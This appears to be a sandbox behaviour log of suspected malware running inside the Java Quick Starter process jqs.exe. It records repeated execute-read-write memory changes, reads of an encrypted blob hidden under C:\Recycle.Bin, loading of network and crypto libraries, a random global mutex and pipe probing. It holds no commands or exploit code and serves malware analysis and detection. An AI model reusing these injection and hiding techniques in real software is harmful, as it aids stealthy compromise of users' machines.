Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 20A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102463108
System info queried Type: BasicInformation success or wait 2102464347
System info queried Type: ProcessorInformation success or wait 2102466081
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D76E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102467285
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAF6E20 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102469005
Thread created PID: 508 TID: 2076 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102472044
Thread created PID: 508 TID: 1208 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102478072
Thread delayed Time: 0 TID: 9078 success or wait 2102481621
Thread delayed Time: 0 TID: 9078 success or wait 2102482021
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102482203
System info queried Type: BasicInformation success or wait 2102482504
System info queried Type: ProcessorInformation success or wait 2102482806
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102484187
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102490931
System info queried Type: BasicInformation success or wait 2102491854
System info queried Type: ProcessorInformation success or wait 2102493552
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DF1E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102494868
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB10A90 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102496607
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102496922
System info queried Type: BasicInformation success or wait 2102497220
System info queried Type: ProcessorInformation success or wait 2102498936
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102499357
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102506048
System info queried Type: BasicInformation success or wait 2102508373
System info queried Type: ProcessorInformation success or wait 2102508677
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DC5E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102509962
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFF2F8 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102510292
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102510608
System info queried Type: BasicInformation success or wait 2102512309
System info queried Type: ProcessorInformation success or wait 2102512605
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102513065
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102520018
System info queried Type: BasicInformation success or wait 2102522252
System info queried Type: ProcessorInformation success or wait 2102522551
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90D2EE Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102525240
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFCF58 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102525549
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102527487
System info queried Type: BasicInformation success or wait 2102527792
System info queried Type: ProcessorInformation success or wait 2102528083
File opened Path: C:\WINDOWS\system32\ntdll.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102528526
Section loaded Path: C:\WINDOWS\system32\ntdll.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102537459
System info queried Type: BasicInformation success or wait 2102538292
System info queried Type: ProcessorInformation success or wait 2102539550
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7C90DB3E Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102540821
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB10168 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102542236
Section loaded Path: \KnownDlls\nspr4.dll Access: write and read and execute Type: unknown Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid object name not found 2102543214
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2102545610
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2102548242
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2102560216
System info queried Type: BasicInformation success or wait 2102561952
System info queried Type: ProcessorInformation success or wait 2102562267
File opened Path: C:\WINDOWS\system32\USER32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102562689
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 4 Value: D8 00 00 00 success or wait 2102565461
File read Path: C:\WINDOWS\system32\user32.dll Offset: none Length: 20 Value: 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102567809
Section loaded Path: C:\WINDOWS\system32\user32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 57344 Protection: readonly Mapped to pid: own pid success or wait 2102570053
System info queried Type: BasicInformation success or wait 2102572355
System info queried Type: ProcessorInformation success or wait 2102572664
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 7E418BF6 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102575338
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFC210 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102575654
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2102577471
System info queried Type: BasicInformation success or wait 2102577772
System info queried Type: ProcessorInformation success or wait 2102578112
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102578565
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102579780
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102582081
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102587038
System info queried Type: BasicInformation success or wait 2102587883
System info queried Type: ProcessorInformation success or wait 2102588221
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D949088 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102589830
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB10D98 Length: 2000 New Protection: page execute and read and write Old Protection: page execute and read and write success or wait 2102593444
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write Old Protection: page execute read success or wait 2102594862
System info queried Type: BasicInformation success or wait 2102595590
System info queried Type: ProcessorInformation success or wait 2102595935
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102597351
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102598903
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102599602
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102604102
System info queried Type: BasicInformation success or wait 2102605372
System info queried Type: ProcessorInformation success or wait 2102606669
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D95EE89 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102608836
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BB104E8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102609169
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102609557
System info queried Type: BasicInformation success or wait 2102609879
System info queried Type: ProcessorInformation success or wait 2102611169
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102612015
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102614203
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102615307
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102618867
System info queried Type: BasicInformation success or wait 2102620678
System info queried Type: ProcessorInformation success or wait 2102621406
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94FABE Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102624128
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAF65C8 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102624853
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102625581
System info queried Type: BasicInformation success or wait 2102626899
System info queried Type: ProcessorInformation success or wait 2102627619
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102628041
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102629209
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102630933
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102634944
System info queried Type: BasicInformation success or wait 2102637804
System info queried Type: ProcessorInformation success or wait 2102638108
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D9A608E Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102639829
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: BAFF660 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102640130
File opened Path: C:\Recycle.Bin\07A49F015E0D693 Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false success or wait 2102642032
File read Path: C:\Recycle.Bin\07A49F015E0D693 Offset: none Length: 5934 Value: 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2102643460
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute read success or wait 2102656743
System info queried Type: BasicInformation success or wait 2102658499
System info queried Type: ProcessorInformation success or wait 2102658808
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102659228
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102660390
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102662467
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102666052
System info queried Type: BasicInformation success or wait 2102668293
System info queried Type: ProcessorInformation success or wait 2102668599
Memory attributes changed PID: 508 Path: C:\Program Files\Java\jre6\bin\jqs.exe Base: 3D94D508 Length: 2000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2102670343
System info queried Type: BasicInformation success or wait 2102672723
System info queried Type: ProcessorInformation success or wait 2102673020
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102674864
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102676000
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102678095
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102681659
System info queried Type: BasicInformation success or wait 2102682506
System info queried Type: ProcessorInformation success or wait 2102684239
System info queried Type: BasicInformation success or wait 2102688500
System info queried Type: ProcessorInformation success or wait 2102688830
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102689249
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102691802
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102692485
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102697438
System info queried Type: BasicInformation success or wait 2102698353
System info queried Type: ProcessorInformation success or wait 2102698659
System info queried Type: BasicInformation success or wait 2102704552
System info queried Type: ProcessorInformation success or wait 2102704851
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102705272
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102708030
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102710124
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102713658
System info queried Type: BasicInformation success or wait 2102715921
System info queried Type: ProcessorInformation success or wait 2102716227
System info queried Type: BasicInformation success or wait 2102721867
System info queried Type: ProcessorInformation success or wait 2102722164
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102724007
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102725224
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102727341
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102732293
System info queried Type: BasicInformation success or wait 2102733141
System info queried Type: ProcessorInformation success or wait 2102734870
System info queried Type: BasicInformation success or wait 2102738870
System info queried Type: ProcessorInformation success or wait 2102740587
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102741063
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102743630
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102744310
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102749259
System info queried Type: BasicInformation success or wait 2102751527
System info queried Type: ProcessorInformation success or wait 2102751834
System info queried Type: BasicInformation success or wait 2102757353
System info queried Type: ProcessorInformation success or wait 2102757653
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102758074
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2102761374
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2102763607
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2102767144
System info queried Type: BasicInformation success or wait 2102768019
System info queried Type: ProcessorInformation success or wait 2102768323
System info queried Type: BasicInformation success or wait 2102774054
System info queried Type: ProcessorInformation success or wait 2102774351
File opened Path: C:\WINDOWS\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102776118
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2102777257
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102778182
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2102783157
System info queried Type: BasicInformation success or wait 2102784002
System info queried Type: ProcessorInformation success or wait 2102785730
System info queried Type: BasicInformation success or wait 2102787850
System info queried Type: ProcessorInformation success or wait 2102789555
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102789981
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2102792549
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102793460
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2102797122
System info queried Type: BasicInformation success or wait 2102799368
System info queried Type: ProcessorInformation success or wait 2102799675
System info queried Type: BasicInformation success or wait 2102805309
System info queried Type: ProcessorInformation success or wait 2102805608
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2102806027
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2102807192
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2102809648
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: 22A0000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2102813098
System info queried Type: BasicInformation success or wait 2102817885
System info queried Type: ProcessorInformation success or wait 2102818955
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2102822539
Thread created PID: 508 TID: 684 EIP: 7C8106F9 Imagepath: C:\Program Files\Java\jre6\bin\jqs.exe Injected: false success or wait 2102826577
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2102844765
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 22A0000 Size: 77824 Protection: readonly Mapped to pid: own pid object name not found 2103404173
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2103406195
Thread delayed Time: 0 TID: 9078 success or wait 2103486900
Thread delayed Time: 0 TID: 9078 success or wait 2103682953
Thread delayed Time: 0 TID: 9078 success or wait 2103684852
Thread delayed Time: 0 TID: 9078 success or wait 2104613574
Thread delayed Time: 0 TID: 9078 success or wait 2104800280
Thread delayed Time: 0 TID: 9078 success or wait 2104803067
Thread delayed Time: 0 TID: 9078 success or wait 2106055503
Thread delayed Time: 0 TID: 9078 success or wait 2106058675
Thread delayed Time: 0 TID: 9078 success or wait 2106061233
Thread delayed Time: 0 TID: 9078 success or wait 2107696235
Thread delayed Time: 0 TID: 9078 success or wait 2107699785
Thread delayed Time: 0 TID: 9078 success or wait 2107701873
Thread delayed Time: 0 TID: 9078 success or wait 2108803454
Thread delayed Time: 0 TID: 9078 success or wait 2108807025
Thread delayed Time: 0 TID: 9078 success or wait 2108809256
Thread delayed Time: 0 TID: 9078 success or wait 2110283550
Thread delayed Time: 0 TID: 9078 success or wait 2110285179
Thread delayed Time: 0 TID: 9078 success or wait 2110286160
Thread delayed Time: 0 TID: 9078 success or wait 2111544727
Thread delayed Time: 0 TID: 9078 success or wait 2111546243
Thread delayed Time: 0 TID: 9078 success or wait 2111547112
Thread delayed Time: 0 TID: 9078 success or wait 2112664501
Thread delayed Time: 0 TID: 9078 success or wait 2112665999
Thread delayed Time: 0 TID: 9078 success or wait 2112666869
Thread delayed Time: 0 TID: 9078 success or wait 2113787816
Thread delayed Time: 0 TID: 9078 success or wait 2113789645
Thread delayed Time: 0 TID: 9078 success or wait 2113790577
Thread delayed Time: 0 TID: 9078 success or wait 2115129786
Thread delayed Time: 0 TID: 9078 success or wait 2115131826
Thread delayed Time: 0 TID: 9078 success or wait 2115132803
Thread delayed Time: 0 TID: 9078 success or wait 2116239065
Thread delayed Time: 0 TID: 9078 success or wait 2116240384
Thread delayed Time: 0 TID: 9078 success or wait 2116241669
Thread delayed Time: 0 TID: 9078 success or wait 2117608342
Thread delayed Time: 0 TID: 9078 success or wait 2117609817
Thread delayed Time: 0 TID: 9078 success or wait 2117610643
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 1208320 Protection: execute Mapped to pid: own pid success or wait 2117791030
Section loaded Path: C:\Program Files\Java\jre6\bin\awt.dll Access: query and write and read and execute Type: image Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid success or wait 2117792402
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D000000 Size: 1351680 Protection: read write Mapped to pid: own pid object name not found 2117798403
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117798997
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2117851679
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117852268
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 2695168 Protection: execute Mapped to pid: own pid success or wait 2117878537
Section loaded Path: C:\Program Files\Java\jre6\bin\client\jvm.dll Access: query and write and read and execute Type: image Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid success or wait 2117879931
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D7F0000 Size: 2777088 Protection: read write Mapped to pid: own pid object name not found 2117886090
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117886679
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2117968186
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2117968809
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 143360 Protection: execute Mapped to pid: own pid success or wait 2117995347
Section loaded Path: C:\Program Files\Java\jre6\bin\dcpr.dll Access: query and write and read and execute Type: image Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid success or wait 2117996595
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1A0000 Size: 143360 Protection: read write Mapped to pid: own pid object name not found 2118002388
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118002975
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118288945
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118289546
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: write and read and execute Type: commit Baseaddress: 10B0000 Size: 77824 Protection: execute Mapped to pid: own pid success or wait 2118317234
Section loaded Path: C:\Program Files\Java\jre6\bin\deploy.dll Access: query and write and read and execute Type: image Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid success or wait 2118318549
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 6D1D0000 Size: 77824 Protection: read write Mapped to pid: own pid object name not found 2118324510
Section loaded Path: C:\WINDOWS\system32\setupapi.dll Access: query and write and read and execute Type: image Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid success or wait 2118325118
Section loaded Path: \KnownDlls\SETUPAPI.DLL Access: write and read and execute Type: unknown Baseaddress: 77920000 Size: 995328 Protection: read write Mapped to pid: own pid object name not found 2118355812
